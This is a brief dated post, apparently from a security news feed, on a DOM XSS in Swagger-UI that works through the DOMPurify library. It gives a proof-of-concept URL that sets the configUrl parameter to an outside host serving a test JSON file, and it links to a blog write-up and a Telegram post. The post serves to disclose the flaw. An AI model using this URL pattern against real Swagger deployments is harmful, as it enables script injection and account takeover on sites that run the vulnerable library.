December 17, 2024 at 01:21AM

Swagger-UI DOM XSS via DOMPurify library.

example.tld/swagger/ index.html?configUrl=https://xss.smarpo.com/test.json

https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/

https://t.me/cKure/15027